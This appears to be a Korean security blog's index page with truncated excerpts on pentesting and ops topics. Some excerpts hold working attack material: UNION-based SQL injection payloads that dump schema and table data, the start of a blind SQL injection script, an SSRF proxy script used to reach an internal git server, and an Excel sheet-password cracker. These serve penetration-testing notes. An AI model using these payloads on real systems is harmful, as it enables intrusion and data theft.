annyoung

엑셀에 걸려있는 시트보호 암호를 크랙해준다. 동작 원리는 아마도 암호가 동일한지 확인하는게 아니라 hash가 동일한지 판별하기 때문에 그런것 같다. 참고로 microsoft excel 2007 파일(XLS)만 되는것 같다. import randomimport sysimport itertoolsimport structimport stringimport olefileallchars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;?@[\]^_`{|}~ "def rand_pass(): s = "" for i in range(random.randint(0,20)): s += random.c..

필자는 AWS SES를 통해 보내는 메일들의 로그(로우데이터)가 필요했는데, AWS가 꼭꼭 숨겨두어서 이를 정리해보고자 한다.참고로 AWS는 로깅이아닌 아카이빙이라 칭하더라.  우선 SES의 자격 증명에 도메인을 등록한다. 등록을 위해서는 Route53 또는 타사 도메인의 레코드에 등록해줘야 자격 증명이 확인된다.등록이 완되면 로깅(아카이빙)을 설정하기 위해 등록된 도메인을 클릭한다. 구성 세트의 편집으로 들어간다. 우측의 세트 생성을 클릭한다. 구성 세트 이름을 입력하고 밑으로 내리면 아카이빙 옵션이 존재하는데, 활성화됨에 체크해주자. 다시 돌아와서 기본 구성 세트 할당에 체크해주고, 기본 구성 세트에 방금 만든 세트를 선택하고 변경 사항 저장을 클릭한다. 좀전에 만든 구성 세트(이미지에서는 examp..

국세청을 사칭해 전자세금계산서 발급 메일을 안내하는 이메일 피싱이다. 피해자는 첨부된 파일을 다운로드받아 여는 경우 HTML로 작성된 다우오피스의 로그인 페이지를 만날 수 있다. (다행히 악성코드 등의 추가 행위는 없다.) 아이디 입력란에는 수신받은 피해자 이메일로 하드코딩 되어 있다.  몇 개만 간추려보자면 로그인 페이지는 다우오피스를 사용하는 다른 기업들의 css, img를 섞어서 만들었다. window.addEventListener("load", () => { function a(a) { return /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(a) } function b(a) { "Enter" === a.key && (a.preventDefault(), g...

대다수의 개발자들이 Swagger API Document를 이용해서 API 문서를 자동 또는 수동으로 정리하곤한다. 기본적으로 /swagger-ui/index.html을 사용하거나 /swagger/index.html을 사용해서 접근하곤 하지만.. 비인가자에 대한 외부 접근 차단을 위해 또는 사내 규칙 등으로 인해 의미없는 단어로 URL 라우팅을 변경한다. 예를 들어 /nopsled-swagger/view.html과 같이 수정해서 운영에 배포하는 경우가 존재한다. 그 경우엔 Swagger에서 사용하는 API에 대한 json 정보들이 담겨있는 api-docs를 찾아보면 가끔 나온다. 참고로 나는 Swagger를 발견하면 Swagger Authentication을 적용하라고 하는데.. 엔드포인트만 변경해놓고 ..

SQL 인젝션 벡터를 cURL로 복사한 후에 인터넷에서 Curl converter를 이용해서 포팅한 후 사용하면 된다. 여기서 컨버팅되는 headers는 config.py로 따로 뺀 후에 headers로 그대로 선언해주면 되고, 세션은 그냥 쿠키만 따로 오버라이딩해서 사용하면 된다. (로그인까지 만드는건 시간낭비...!) pythonimport requestsfrom config import headersfrom urllib.parse import quote_plusbin_str = ''data = "idx=1"headers['Cookie'] = '' # overriding cookie for login sessionfor i in range(1, 13): # length(database()): 12 ..

모의해킹을 하다보면 아주 가끔 레거시한 환경에서 SQL Injection이 보이곤한다. 자주쓸 것 같아서 메모해둬야겠다 싶어서 적어놔야겠다. table_schema.table_name 형식으로 테이블명 가져오기' union all select 1,group_concat(concat(table_schema, 0x2E, table_name)),3 from information_schema.tables# 테이블 컬럼 가져오기' union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='$TABLE_NAME'# 테이블 데이터 가져오기PoC용으로 1개만 가져오도록 limit으로 잘랐음' union a..

폴더 정리하다가 찾은 코드인데 나름 재밌었던 취약점이었다. example.com의 서버가 이미지 다운로드를 지원하고 있었고, 아마도 example.com이 DMZ에 있던거 같은데 이로 인해서 내부 git에 접근할 수 있던 취약점이었다. 물론 git commit date가 최소 2 years ago 이러다보니.. 버려진 사이트 같았고 인증 절차가 없다보니 git에 업로드된 소스코드들을 볼 수 있었다.import requestsfrom flask import Flask, requestapp = Flask(__name__)@app.route('/gitweb')def index(): return requests.get('https://example.com/v1/download/image', dict( ..

2024년 7월 25일에 추가된 WebAPI oncontentvisibilityautostatechange 덕분에 input type이 hidden인 경우에도 XSS를 트리거할 수 있게 되었다.  * 페이로드 출처: https://x.com/kinugawamasato/status/1816234368714871185

Install apache(httpd) and phpbrew install httpd php .bashrc or .zshrc setupbashrc나 zshrc에 등록해놓고, source ~/.zshrc 처럼 사용해서 적용해준 후에 apache open|start|stop|restart|status 를 입력해주면 각각 switch에 맞게 실행된다.apache() { case "$1" in open) echo "➡️ Move to apache directory" cd /usr/local/etc/httpd ;; start) echo "🔥 Starting Apache (httpd) using Home..

alertkor인데 zlertkor로 치환하거나.. alert를 빈공백으로 치환해서 kor가 되어버리곤 한다.. 민원인이 내용에 alert 쓰면 zlert로 치환하려나..? confirmkor나 promptkor로 바꿔야겠다...!